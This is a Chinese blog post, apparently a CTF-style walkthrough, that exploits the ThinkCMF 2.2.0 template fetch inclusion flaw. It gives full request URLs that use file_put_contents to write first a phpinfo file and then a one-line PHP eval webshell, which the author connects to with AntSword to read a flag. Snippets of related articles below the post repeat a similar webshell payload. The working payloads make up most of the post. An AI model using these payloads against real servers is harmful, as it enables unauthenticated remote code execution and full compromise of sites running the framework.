ThinkCMF 2.2.0漏洞

于 2023-09-22 16:43:22 发布
阅读量290 收藏
点赞数 1
文章标签: 前端框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79773660/article/details/133176074
版权

ThinkCMF 2.2.0框架漏洞

在这里插入图片描述
访问可以看到下面
在这里插入图片描述
访问README.md,测试漏洞是否存在,这里是存在的。
在这里插入图片描述
我们先写一个phpinfo语句,看能否实现上传文件
?a=fetch&templateFile=public/index&prefix=‘’&content=file_put_contents(‘shell.php’,‘<?php phpinfo(); ?>’)
在这里插入图片描述

在访问一下shell.php
/shell.php
在这里插入图片描述
写入一个一句话木马,并执行。
/?a=fetch&templateFile=public/index&prefix=‘’&content=file_put_contents(‘shell.php’,‘<?php @eval($_POST[111]); ?>’)
在这里插入图片描述
用蚁剑连接一下
在这里插入图片描述
在tmp目录下可以找到flag
在这里插入图片描述

金鱼呀
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【组件攻击链】ThinkCMF 高危漏洞分析与利用
systemino的博客
11-27 993
一、组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 普通的CMS(内容管理系统)一般不能完成所有的需求,而因为CMS在ThinkCMF内部
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2167
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1608
【thinkcmf-文件包含】public函数
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 694
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
ThinkCMF 任意内容包含getshell漏洞
最新发布
10-26
ThinkCMF X1.6.0、ThinkCMF X2.1.0、ThinkCMF X2.2.0、ThinkCMF X2.2.1、ThinkCMF X2.2.2 都存在该漏洞。 环境搭建: 1. 下载 ThinkCMF X2.2.2,解压后放在 WWW 目录下,然后浏览器访问即可看到安装页面。 漏洞...
nacos-2.2.0
07-31
Nacos是阿里巴巴开源的一款分布式服务治理和配置中心的框架,其2.2.0版本带来了许多新特性和改进。在本文中,我们将深入探讨Nacos的核心功能、2.2.0版本的重要更新以及如何在实际项目中应用这些知识点。 首先,...
DragonFace2.2.0.rar
05-11
"DragonFace2.2.0.rar" 是一个压缩文件,其中包含了DragonFace 2.2.0版本的相关组件和资源。DragonFace可能是一个人脸识别技术的软件框架或库,专为开发人员提供高效、准确的人脸识别功能。在这个版本中,我们可能会...
jTessBoxEditor2.2.0 最新版
11-21
**jTessBoxEditor 2.2.0:OCR训练利器** **简介** jTessBoxEditor是一款专门针对机器学习中的OCR(Optical Character Recognition,光学字符识别)模型训练而设计的工具。它主要用于创建和编辑Tesseract OCR的训练...
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2838
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
thinkcmf-ThinkCMFX-master
12-11
基于bootstrap开发的网站模板,可用于二次开发,内含丰富控件,界面完美大气。
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2030
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1120
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1429
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
ThinkCMF框架上的任意内容包含漏洞复现+分析
weixin_44897902的博客
11-16 820
thinkcmf的任意内容包含漏洞
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1610
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
Thinkcmf2.2安装以及任意文件写入漏洞复现
SolitudeL的博客
09-16 488
I thinkcmf安装 1.下载ThinkCMF X2.2.0 链接: https://pan.baidu.com/s/1dEJJoU9?errno=0&errmsg=Auth%20Login%20Sucess&&bduss=&ssnerror=0&traceid= 此处我使用宝塔面板来搭建网站和安装thinkcmf2.2 2.进入宝塔面板点击你搭建的网站的根目录 上传你刚才下载的thinkcmf2.2的安装包 注意: 只能上传压缩包,上传成功后点击文件解压缩
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 2397
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi
mimikatz2.2.0
05-12
因此,mimikatz2.2.0也成为了一种非常危险的工具,是黑客攻击的一个利器。为避免被攻击者使用mimikatz2.2.0获取密码,建议采取以下措施:设定强密码,定期更换密码,禁用Windows本地管理员账户,限制远程桌面连接,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金鱼呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值